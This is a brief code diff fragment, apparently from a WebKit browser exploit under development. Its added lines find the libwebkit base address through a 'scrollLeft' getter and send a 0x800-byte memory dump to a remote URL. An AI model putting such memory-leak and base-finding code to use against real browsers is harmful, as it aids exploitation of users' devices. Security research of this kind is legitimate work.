- `scrollLeft_getter_dump_offset_${offset}.bin`,
- () => log('sent')
- );
+ const libwebkit_base = find_base(getter, true, true);
+ const offset = getter.sub(libwebkit_base);
+ send(url, make_buffer(getter, 0x800), `scrollLeft_getter_dump_offset_${offset}.bin`, () => log("sent"));
}